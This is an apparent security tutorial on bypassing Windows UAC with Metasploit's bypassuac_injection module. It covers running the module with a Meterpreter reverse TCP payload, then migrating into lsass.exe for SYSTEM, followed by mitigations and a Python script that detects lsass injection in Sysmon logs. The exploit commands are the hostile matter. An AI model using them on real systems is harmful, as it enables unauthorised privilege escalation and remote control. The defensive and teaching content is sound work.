UAC Bypass via Injection
This technique uses the Metasploit local exploit module bypassuac_injection, which reflectively injects a DLL into a process of the current (medium-integrity) user rather than dropping several binaries to disk, and from there abuses Windows auto-elevation to spawn a second Meterpreter session at high integrity, i.e. as a full administrator with the UAC restrictions removed. It only works when the session's user is already a member of the local Administrators group and UAC is not set to Always Notify. The bypass by itself does not yield SYSTEM; that takes a further step such as getsystem or migrating into a process that already runs as SYSTEM. lsass.exe is often named for this, but it is a poor target, as step 2 explains.
Steps to Perform UAC Bypass via Memory Injection
1. Load the Exploit Module
In Metasploit, use the bypassuac_injection exploit module (set LHOST and LPORT to match your listener before running it):
use exploit/windows/local/bypassuac_injection
set session 1
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
set session 1 → Specifies the Meterpreter session to elevate; it must be a native Meterpreter session running as a user in the local Administrators group.
set TARGET 1 → Selects the Windows x64 target (target 0 is Windows x86); it must match the architecture of both the payload and the session.
set PAYLOAD windows/x64/meterpreter/reverse_tcp → Configures the payload the elevated process will run, here a reverse TCP Meterpreter back to LHOST:LPORT.
exploit → Runs the module. On success a second Meterpreter session opens; check it with getuid and getprivs: the user is unchanged, but the token is now high integrity and carries the administrator privileges, SeDebugPrivilege included.
2. Process Migration
The new session runs as an elevated administrator, not as SYSTEM. To obtain SYSTEM, either run getsystem in the new session or migrate into a process that already runs as SYSTEM. The original instructions use lsass.exe; the commands are shown as given, with the caveats that follow:
ps -S lsass.exe
migrate 484
ps -S lsass.exe → Lists processes whose name matches lsass.exe, so the PID can be read instead of guessed.
migrate 484 → Moves the Meterpreter session into process ID 484. The number is only an example; use the PID that ps printed on the target.
Migration works because the elevated token carries SeDebugPrivilege, which lets the session open a SYSTEM-owned process, write the Meterpreter DLL into it and start a thread there; once inside, the session runs with that process's SYSTEM token. lsass.exe is nonetheless a bad choice: it is the process Windows depends on for authentication, so a failed injection crashes it and forces a reboot; when LSA Protection (RunAsPPL) is enabled it cannot be opened with write or thread-creation rights from a non-protected process, so the migrate simply fails; and it is the most closely watched process on any monitored host. Migration also provides no persistence: the session is gone as soon as the host process exits or the machine reboots. A less conspicuous SYSTEM-owned process, or getsystem followed by a separate persistence mechanism, is the more reliable route.
Mitigation Measures
To protect against UAC bypass attacks:
Do not give everyday accounts local administrator rights; this module can only elevate a user who is already in the Administrators group, so a standard-user account is not affected by it.
Enable UAC in Always Notify mode; the module refuses to run at that level, because the auto-elevation it relies on is disabled there.
Enable LSA Protection (RunAsPPL) so that lsass.exe runs as a protected process that ordinary processes cannot open for injection, and enable Windows Defender Credential Guard to move the credential secrets out of lsass.exe entirely; Credential Guard protects the secrets, not the process, so it does not by itself stop the injection.
Apply application control (AppLocker or Windows Defender Application Control) to restrict execution of unauthorized binaries, scripts and DLLs, including the payload DLL the module drops for the auto-elevated program to load.
Monitor process creation and process access: Security Event ID 4688 records every new process (watch for high-integrity processes started from an unexpected parent), but it cannot see a migration, which creates no process. Migration into lsass.exe appears as Sysmon Event ID 10 (ProcessAccess) with lsass.exe as TargetImage and a GrantedAccess mask that includes write and thread-creation rights, and usually also as Sysmon Event ID 8 (CreateRemoteThread), depending on the thread-creation method Meterpreter uses.
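The monitoring point above, worked as an added example that is not part of the original page or of Metasploit: a small Python checker that runs over Sysmon Event ID 10 records saved as XML and flags processes that opened lsass.exe with the rights a Meterpreter migrate needs. The sample events, the path of the injecting process, the PIDs and the allowlist of legitimate source images are all constructed assumptions, and the XML is abbreviated to the fields the checker reads.

```python
"""Added example (not from the original page or from Metasploit): flag migration or
injection into lsass.exe in Sysmon Event ID 10 (ProcessAccess) records saved as XML.
The sample events, paths, PIDs and allowlist below are constructed for the demo."""
import xml.etree.ElementTree as ET

# Process access rights from winnt.h that writing a DLL into a process and starting
# a thread in it require; Sysmon logs the mask in GrantedAccess as hex text.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Source images that legitimately open lsass.exe with these rights.  Assumed
# starting point only: extend it from your own baseline (EDR/AV engines usually
# belong here), compared in lower case.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Sysmon event XML reduced to the fields used below (real records carry more,
# e.g. UtcTime, process GUIDs and CallTrace).
EVENT10_TEMPLATE = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>10</EventID></System>
  <EventData>
    <Data Name="SourceProcessId">{spid}</Data>
    <Data Name="SourceImage">{source}</Data>
    <Data Name="TargetProcessId">{tpid}</Data>
    <Data Name="TargetImage">{target}</Data>
    <Data Name="GrantedAccess">{granted}</Data>
  </EventData>
</Event>"""

LSASS = r"C:\Windows\system32\lsass.exe"

# Three constructed records: a Meterpreter-style open from a user-writable path
# with full access, a legitimate system component, and a low-rights query
# (PROCESS_QUERY_LIMITED_INFORMATION) from svchost.exe.
SAMPLE_EVENTS = [
    EVENT10_TEMPLATE.format(spid=4120, source=r"C:\Users\alice\AppData\Local\Temp\update.exe",
                            tpid=484, target=LSASS, granted="0x1FFFFF"),
    EVENT10_TEMPLATE.format(spid=620, source=r"C:\Windows\system32\csrss.exe",
                            tpid=484, target=LSASS, granted="0x1FFFFF"),
    EVENT10_TEMPLATE.format(spid=1216, source=r"C:\Windows\system32\svchost.exe",
                            tpid=484, target=LSASS, granted="0x1000"),
]


def parse_sysmon_event(xml_text):
    """Return (event_id, {Data Name: value}) for one Sysmon <Event> element."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("./{*}System/{*}EventID"))
    data = {d.get("Name"): (d.text or "") for d in root.find("./{*}EventData")}
    return event_id, data


def is_lsass_injection(event_id, data):
    """True when a non-allowlisted process opened lsass.exe with every right that
    writing memory and starting a thread in it requires."""
    if event_id != 10:
        return False
    if not data.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    if data.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return False
    granted = int(data.get("GrantedAccess", "0"), 16)
    return granted & INJECT_RIGHTS == INJECT_RIGHTS


def find_lsass_injections(events):
    """Return (SourceImage, SourceProcessId, GrantedAccess) for each suspicious record."""
    hits = []
    for xml_text in events:
        event_id, data = parse_sysmon_event(xml_text)
        if is_lsass_injection(event_id, data):
            hits.append((data["SourceImage"], int(data["SourceProcessId"]), data["GrantedAccess"]))
    return hits


if __name__ == "__main__":
    for source, pid, granted in find_lsass_injections(SAMPLE_EVENTS):
        print(f"ALERT: {source} (PID {pid}) opened lsass.exe with {granted}")
```

Only the first constructed record is reported: the csrss.exe open is allowlisted, and the svchost.exe open lacks the write and thread-creation bits. Requiring all three rights keeps credential-dumping reads (PROCESS_VM_READ alone) out of this particular rule; a separate rule should cover those.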